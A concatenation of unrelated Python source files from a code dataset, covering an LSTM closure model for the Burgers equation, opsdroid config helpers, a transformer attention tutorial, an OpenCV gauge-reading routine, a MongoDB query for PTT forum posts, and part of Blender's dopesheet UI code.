MinMaxScaler(feature_range=(-1,1))\n scalerOut = scalerOut.fit(ytrain)\n ytrain = scalerOut.transform(ytrain)\n \n for k in range(lookback):\n if k == 0:\n tmp = xtrain[:,k,:]\n else:\n tmp = np.vstack([tmp,xtrain[:,k,:]])\n \n scalerIn = MinMaxScaler(feature_range=(-1,1))\n scalerIn = scalerIn.fit(tmp)\n for i in range(m):\n xtrain[i,:,:] = scalerIn.transform(xtrain[i,:,:])\n \n #%%\n # Shuffling data\n perm = np.random.permutation(m)\n xtrain = xtrain[perm,:,:]\n ytrain = ytrain[perm,:]\n \n # create folder\n if os.path.isdir(\"./LSTM Model\"):\n print('LSTM models folder already exists')\n else: \n print('Creating LSTM models folder')\n os.makedirs(\"./LSTM Model\")\n \n # Removing old models\n model_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\n if os.path.isfile(model_name):\n os.remove(model_name)\n \n # create the LSTM architecture\n model = Sequential()\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), activation='tanh'))\n model.add(Dense(labels.shape[1]))\n \n # compile model\n model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse'])\n \n # run the model\n history = model.fit(xtrain, ytrain, epochs=200, batch_size=64, validation_split=0.25)\n \n # evaluate the model\n scores = model.evaluate(xtrain, ytrain, verbose=0)\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n \n loss = history.history['loss']\n val_loss = history.history['val_loss']\n \n plt.figure()\n epochs = range(1, len(loss) + 1)\n plt.semilogy(epochs, loss, 'b', label='Training loss')\n plt.semilogy(epochs, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n filename = 'LSTM Model/LP_loss.png'\n plt.savefig(filename, dpi = 200)\n plt.show()\n \n \n # Save the model\n model.save(model_name)\n \n # Save the scales\n filename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\n joblib.dump(scalerIn,filename) \n filename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\n joblib.dump(scalerOut,filename) \n\n\n#%% Testing\nmodel_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\nmodel = load_model(model_name) \n\n# load scales\nfilename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\nscalerIn = joblib.load(filename) \nfilename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\nscalerOut = joblib.load(filename) \n\nuLSTM = np.zeros((7,ns+1,nx+1))\n\nfor kk in range(7):\n nxb= int((kk+1)*nx/8)\n \n xTest = xi[kk,:,:]\n yTest = yi[kk,:,:]\n xtest = np.zeros((1,lookback,2*npt+1)) \n \n # Initializing\n uu = np.zeros(nx-nxb+1)\n uu[0] = 1.0\n u1 = np.zeros(nx-nxb+1)\n u1[0] = 1.0\n uLSTM[kk,0,nxb:] = uu\n for i in range(lookback):\n temp = xTest[i,:]\n temp = temp.reshape(1,-1)\n xtest[0,i,:] = scalerIn.transform(temp) \n \n # Prediction\n for i in range(lookback,ns+1):\n ytest = model.predict(xtest)\n ytest = scalerOut.inverse_transform(ytest) # rescale \n \n # integrate one time step || RK3 scheme\n # first step \n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,uu)\n u1[1:nx] = uu[1:nx] + dt*rr[1:nx]\n \n # second step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n u1[1:nx] = 0.75*uu[1:nx] + 0.25*u1[1:nx] + 0.25*dt*rr[1:nx]\n \t\n # third step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n uu[1:nx] = 1.0/3.0*uu[1:nx] + 2.0/3.0*u1[1:nx] + 2.0/3.0*dt*rr[1:nx]\n uu[0] = ytest\n u1[0] = ytest\n \n uLSTM[kk,i,nxb:] = uu\n print([kk,i])\n \n # Update xtest\n for k in range(lookback-1):\n xtest[0,k,:] = xtest[0,k+1,:]\n tmp = np.copy(xTest[i,:])\n tmp[0:npt] = uu[0:npt] \n tmp = tmp.reshape(1,-1)\n xtest[0,lookback-1,:] = scalerIn.transform(tmp) \n\nnp.save('./Data/uFOM.npy',uFOM)\nnp.save('./Data/uLP_'+str(npt)+'.npy',uLSTM)\n\n\n", "sub_path": "1_1D Burgers [Ex1 and Ex2]/1_Right travelling wave [Ex1]/2_Burgers_Square_LP_closure.py", "file_name": "2_Burgers_Square_LP_closure.py", "file_ext": "py", "file_size_in_byte": 8263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.random.seed", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.random.set_seed", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 146, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 169, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 176, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "joblib.dump", "line_number": 208, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 215, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 219, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 275, "usage_type": "call"}]} {"seq_id": "398631192", "text": "\"\"\"Helper functions to use within OpsDroid.\"\"\"\n\nimport os\nimport stat\nimport shutil\nimport logging\nimport filecmp\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef get_opsdroid():\n \"\"\"Return the running opsdroid instance.\"\"\"\n from opsdroid.core import OpsDroid\n if len(OpsDroid.instances) == 1:\n return OpsDroid.instances[0]\n\n return None\n\n\ndef del_rw(action, name, exc):\n \"\"\"Error handler for removing read only files.\"\"\"\n os.chmod(name, stat.S_IWRITE)\n os.remove(name)\n\n# This is meant to provide backwards compatibility for versions\n# prior to 0.12.0 in the future this will probably be deleted\n\n\ndef move_config_to_appdir(src, dst):\n \"\"\"Copy any .yaml extension in \"src\" to \"dst\" and remove from \"src\".\"\"\"\n yaml_files = [file for file in os.listdir(src)\n if '.yaml' in file[-5:]]\n\n if not os.path.isdir(dst):\n os.mkdir(dst)\n\n for file in yaml_files:\n original_file = os.path.join(src, file)\n copied_file = os.path.join(dst, file)\n shutil.copyfile(original_file, copied_file)\n _LOGGER.info(_('File %s copied from %s to %s '\n 'run opsdroid -e to edit the '\n 'main config file'), file,\n src, dst)\n if filecmp.cmp(original_file, copied_file):\n os.remove(original_file)\n", "sub_path": "opsdroid/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "opsdroid.core.OpsDroid.instances", "line_number": 15, "usage_type": "attribute"}, {"api_name": "opsdroid.core.OpsDroid", "line_number": 15, "usage_type": "name"}, {"api_name": "opsdroid.core.OpsDroid.instances", "line_number": 16, "usage_type": "attribute"}, {"api_name": "opsdroid.core.OpsDroid", "line_number": 16, "usage_type": "name"}, {"api_name": "os.chmod", "line_number": 23, "usage_type": "call"}, {"api_name": "stat.S_IWRITE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 24, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 41, "usage_type": "call"}, {"api_name": "filecmp.cmp", "line_number": 46, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 47, "usage_type": "call"}]} {"seq_id": "359334938", "text": "import sentencepiece as spm\nimport torch\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport torch.nn as nn\n# vocab loading\nvocab_file = \"/Users/a60058238/Desktop/dev/workspace/nlp-study/Data/kowiki/kowiki.model\"\nvocab = spm.SentencePieceProcessor()\nvocab.load(vocab_file)\n\n# 입력 texts\nlines = [\n \"겨울은 추워요.\",\n \"감기 조심하세요.\"\n]\n\n# text를 tensor로 변환\ninputs = []\nfor line in lines:\n pieces = vocab.encode_as_pieces(line)\n ids = vocab.encode_as_ids(line)\n inputs.append(torch.tensor(ids))\n print(pieces)\n\n# 입력 길이가 다르므로 입력 최대 길이에 맟춰 padding(0)을 추가 해 줌\ninputs = torch.nn.utils.rnn.pad_sequence(inputs, batch_first=True, padding_value=0)\n# shape\nprint(inputs.size())\n# 값\nprint(inputs)\n\nn_vocab = len(vocab) # vocab count\nd_hidn = 128 # hidden size\nnn_emb = torch.nn.Embedding(n_vocab, d_hidn) # embedding 객체\n\ninput_embs = nn_emb(inputs) # input embedding\nprint(input_embs.size())\n\n\"\"\" sinusoid position embedding \"\"\"\ndef get_sinusoid_encoding_table(n_seq, d_hidn):\n def cal_angle(position, i_hidn):\n return position / np.power(10000, 2 * (i_hidn // 2) / d_hidn)\n def get_posi_angle_vec(position):\n return [cal_angle(position, i_hidn) for i_hidn in range(d_hidn)]\n\n sinusoid_table = np.array([get_posi_angle_vec(i_seq) for i_seq in range(n_seq)])\n sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # even index sin\n sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # odd index cos\n\n return sinusoid_table\n\n# position encoding 구하는 절\nn_seq = 64\npos_encoding = get_sinusoid_encoding_table(n_seq, d_hidn)\n\nprint (pos_encoding.shape) # 크기 출력\nplt.pcolormesh(pos_encoding, cmap='RdBu')\nplt.xlabel('Depth')\nplt.xlim((0, d_hidn))\nplt.ylabel('Position')\nplt.colorbar()\nplt.show()\n\npos_encoding = torch.FloatTensor(pos_encoding)\nnn_pos = torch.nn.Embedding.from_pretrained(pos_encoding, freeze=True)\n\npositions = torch.arange(inputs.size(1), device=inputs.device, dtype=inputs.dtype).expand(inputs.size(0), inputs.size(1)).contiguous() + 1\npos_mask = inputs.eq(0)\n\npositions.masked_fill_(pos_mask, 0)\npos_embs = nn_pos(positions) # position embedding\n\nprint(inputs)\nprint(positions)\nprint(pos_embs.size())\n\n# Transformer에 사용될 입력\n# input embedding과 postion embedding의 합으로 input_sums 생\ninput_sums = input_embs + pos_embs\n\n#Scale Dot Product Attention에서 입력으로 사용될 Q, K, V\n# Scale Dot Product Attention의 경우 MatMul(softmax(mask(scale(matmul(Q,K), V)\n#\nQ = input_sums\nK = input_sums\nV = input_sums\nattn_mask = inputs.eq(0).unsqueeze(1).expand(Q.size(0), Q.size(1), K.size(1))\nprint(attn_mask.size())\nprint(attn_mask[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 Q * K-transpose 계산분\n# matmul(Q,K) 부분\nscores = torch.matmul(Q, K.transpose(-1, -2))\nprint(scores.size())\nprint(scores[0])\n\n# softmax(Q * k^T / K-dimension) * V 수식의 d_head**0.5\n# scale 하는 부\nd_head = 64\nscores = scores.mul_(1/d_head**0.5)\nprint(scores.size())\nprint(scores[0])\n\n# Mask(opt) 하는 부분\nscores.masked_fill_(attn_mask, -1e9)\nprint(scores.size())\nprint(scores[0])\n\n#Softmax\nattn_prob = nn.Softmax(dim=-1)(scores)\nprint(attn_prob.size())\nprint(attn_prob[0])\n\n# attn_prov * V\n# attn_prov는 MatMul(softmax(mask(scale(matmul(Q,K), V)에서\n# softmax(mask(scale(matmul(Q,K)) 부분에 해당한다.\ncontext = torch.matmul(attn_prob, V)\nprint(context.size())\n\n\nW_Q = nn.Linear(d_hidn, n_head * d_head)\nW_K = nn.Linear(d_hidn, n_head * d_head)\nW_V = nn.Linear(d_hidn, n_head * d_head)\n\n# (bs, n_seq, n_head * d_head)\nq_s = W_Q(Q)\nprint(q_s.size())\n# (bs, n_seq, n_head, d_head)\nq_s = q_s.view(batch_size, -1, n_head, d_head)\nprint(q_s.size())\n# (bs, n_head, n_seq, d_head)\nq_s = q_s.transpose(1,2)\nprint(q_s.size())\n\n\n\n\n", "sub_path": "ETC/inputEmbedding.py", "file_name": "inputEmbedding.py", "file_ext": "py", "file_size_in_byte": 3807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sentencepiece.SentencePieceProcessor", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.Embedding.from_pretrained", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}]} {"seq_id": "397893605", "text": "import numpy as np\nimport cv2\n\n\ndef main_process(img, center_tally):\n mask_zero_area = create_mask_zero_area(img, center_tally)\n zero_area_binary = create_binary(mask_zero_area, img)\n zero_coords = get_zero_coordinates(zero_area_binary)\n\n if zero_coords is None:\n return center_tally\n return zero_coords\n\n\ndef create_mask_zero_area(img, center_tally):\n W, H = img.shape[:2]\n mask = np.zeros((W, H), np.uint8)\n\n size_boundaries = int(W * 0.015)\n\n mask[\n center_tally[1] - size_boundaries: center_tally[1],\n center_tally[0] - size_boundaries: center_tally[0] + size_boundaries] = 1\n\n return mask\n\n\ndef create_binary(mask_zero_area, img):\n\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n channels = cv2.split(img_hsv)\n value = channels[2] * mask_zero_area\n\n mean_masked_value = np.mean(np.ma.masked_where(value == 0, value))\n std_masked_value = np.std(np.ma.masked_where(value == 0, value))\n\n bin = cv2.inRange(value, 0, mean_masked_value - (1.5 * std_masked_value)) * mask_zero_area\n\n return bin\n\n\ndef get_zero_coordinates(zero_binary_area):\n\n contours, hir = cv2.findContours(zero_binary_area, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # Contour Detection\n\n if len(contours) is 0:\n return None\n\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt = contours[max_index]\n\n M = cv2.moments(cnt)\n try:\n cx = int(M['m10'] / M['m00'])\n cy = int(M['m01'] / M['m00'])\n return (cx, cy)\n except Exception:\n return None\n\n", "sub_path": "backend/processing/image_processing/dial/zero.py", "file_name": "zero.py", "file_ext": "py", "file_size_in_byte": 1573, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ma.masked_where", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.std", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.ma.masked_where", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.moments", "line_number": 53, "usage_type": "call"}]} {"seq_id": "262115677", "text": "import pymongo\nfrom pymongo import MongoClient\n\ndef main():\n\t# parseAuthor('OtsukaAi')\n\t#queryUser('OtsukaAi', 'myhome6206')\n\tqueryUser('Gossiping', 'blza')\n\ndef queryUser(board, username):\n\tclient = MongoClient('localhost', 27017)\n\tcollection = client['Ptt']['Weekarticle' + board]\n\n\tuser_record = collection.find({\n\t\t'$or':[\n\t\t\t{'author.account': username},\n\t\t\t{'messages':{\n\t\t\t\t\t'$elemMatch':{'push_userid': username}\n\t\t\t}}\n\t\t]\n\t}).sort('date', pymongo.DESCENDING)\n\treturn user_record\n\n\t#for record in user_record:\n\t#\tprint record['article_title'], record['date']\n\nif __name__ == '__main__':\n\tmain()", "sub_path": "web/Pttuser.py", "file_name": "Pttuser.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pymongo.MongoClient", "line_number": 10, "usage_type": "call"}, {"api_name": "pymongo.DESCENDING", "line_number": 20, "usage_type": "attribute"}]} {"seq_id": "334960945", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom bpy.types import (\n Header,\n Menu,\n Panel,\n)\n\n#######################################\n# DopeSheet Filtering - Header Buttons\n\n# used for DopeSheet, NLA, and Graph Editors\n\n\ndef dopesheet_filter(layout, context, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n row = layout.row(align=True)\n row.prop(dopesheet, \"show_only_selected\", text=\"\")\n row.prop(dopesheet, \"show_hidden\", text=\"\")\n\n if is_nla:\n row.prop(dopesheet, \"show_missing_nla\", text=\"\")\n else: # graph and dopesheet editors - F-Curves and drivers only\n row.prop(dopesheet, \"show_only_errors\", text=\"\")\n\n if not generic_filters_only:\n if bpy.data.collections:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_collection\", text=\"\")\n\n if not is_nla:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n#######################################\n# Dopesheet Filtering Popovers\n\n# Generic Layout - Used as base for filtering popovers used in all animation editors\n# Used for DopeSheet, NLA, and Graph Editors\n\n\nclass DopesheetFilterPopoverBase:\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n # Generic = Affects all datatypes\n # XXX: Perhaps we want these to stay in the header instead, for easy/fast access\n @classmethod\n def draw_generic_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.prop(dopesheet, \"show_only_selected\", icon='NONE')\n col.prop(dopesheet, \"show_hidden\", icon='NONE')\n\n if is_nla:\n col.prop(dopesheet, \"show_missing_nla\", icon='NONE')\n else: # graph and dopesheet editors - F-Curves and drivers only\n col.prop(dopesheet, \"show_only_errors\", icon='NONE')\n\n # Name/Membership Filters\n # XXX: Perhaps these should just stay in the headers (exclusively)?\n @classmethod\n def draw_search_filters(cls, context, layout, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.label(text=\"With Name:\")\n if not is_nla:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n if (not generic_filters_only) and (bpy.data.collections):\n col = layout.column(align=True)\n col.label(text=\"In Collection:\")\n col.prop(dopesheet, \"filter_collection\", text=\"\")\n\n # Standard = Present in all panels\n @classmethod\n def draw_standard_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n\n # datablock filters\n layout.label(text=\"Filter by Type:\")\n flow = layout.grid_flow(row_major=True, columns=2, even_rows=False, align=False)\n\n flow.prop(dopesheet, \"show_scenes\", text=\"Scenes\")\n flow.prop(dopesheet, \"show_nodes\", text=\"Node Trees\")\n\n # object types\n if bpy.data.armatures:\n flow.prop(dopesheet, \"show_armatures\", text=\"Armatures\")\n if bpy.data.cameras:\n flow.prop(dopesheet, \"show_cameras\", text=\"Cameras\")\n if bpy.data.grease_pencil:\n flow.prop(dopesheet, \"show_gpencil\", text=\"Grease Pencil Objects\")\n if bpy.data.lights:\n flow.prop(dopesheet, \"show_lights\", text=\"Lights\")\n if bpy.data.meshes:\n flow.prop(dopesheet, \"show_meshes\", text=\"Meshes\")\n if bpy.data.curves:\n flow.prop(dopesheet, \"show_curves\", text=\"Curves\")\n if bpy.data.lattices:\n flow.prop(dopesheet, \"show_lattices\", text=\"Lattices\")\n if bpy.data.metaballs:\n flow.prop(dopesheet, \"show_metaballs\", text=\"Metaballs\")\n\n # data types\n flow.prop(dopesheet, \"show_worlds\", text=\"Worlds\")\n if bpy.data.particles:\n flow.prop(dopesheet, \"show_particles\", text=\"Particles\")\n if bpy.data.linestyles:\n flow.prop(dopesheet, \"show_linestyles\", text=\"Line Styles\")\n if bpy.data.speakers:\n flow.prop(dopesheet, \"show_speakers\", text=\"Speakers\")\n if bpy.data.materials:\n flow.prop(dopesheet, \"show_materials\", text=\"Materials\")\n if bpy.data.textures:\n flow.prop(dopesheet, \"show_textures\", text=\"Textures\")\n if bpy.data.shape_keys:\n flow.prop(dopesheet, \"show_shapekeys\", text=\"Shape Keys\")\n if bpy.data.cache_files:\n flow.prop(dopesheet, \"show_cache_files\", text=\"Cache Files\")\n\n layout.separator()\n\n # Object Data Filters\n\n # TODO: Add per-channel/axis convenience toggles?\n split = layout.split()\n\n col = split.column()\n col.prop(dopesheet, \"show_transforms\", text=\"Transforms\")\n\n col = split.column()\n col.prop(dopesheet, \"show_modifiers\", text=\"Modifiers\")\n\n layout.separator()\n\n # performance-related options (users will mostly have these enabled)\n col = layout.column(align=True)\n col.label(text=\"Options:\")\n col.prop(dopesheet, \"use_datablock_sort\", icon='NONE')\n\n\n# Popover for Dopesheet Editor(s) - Dopesheet, Action, Shapekey, GPencil, Mask, etc.\nclass DOPESHEET_PT_filters(DopesheetFilterPopoverBase, Panel):\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n def draw(self, context):\n layout = self.layout\n\n dopesheet = context.space_data.dopesheet\n ds_mode = context.space_data.mode\n\n layout.prop(dopesheet, \"show_summary\", text=\"Summary\")\n\n DopesheetFilterPopoverBase.draw_generic_filters(context, layout)\n\n if ds_mode in {'DOPESHEET', 'ACTION', 'GPENCIL'}:\n layout.separator()\n generic_filters_only = ds_mode != 'DOPESHEET'\n DopesheetFilterPopoverBase.draw_search_filters(context, layout,\n generic_filters_only=generic_filters_only)\n\n if ds_mode == 'DOPESHEET':\n layout.separator()\n DopesheetFilterPopoverBase.draw_standard_filters(context, layout)\n\n\n#######################################\n# DopeSheet Editor - General/Standard UI\n\nclass DOPESHEET_HT_header(Header):\n bl_space_type = 'DOPESHEET_EDITOR'\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n row = layout.row(align=True)\n row.template_header()\n\n if st.mode == 'TIMELINE':\n from .space_time import (\n TIME_MT_editor_menus,\n TIME_HT_editor_buttons,\n )\n TIME_MT_editor_menus.draw_collapsible(context, layout)\n 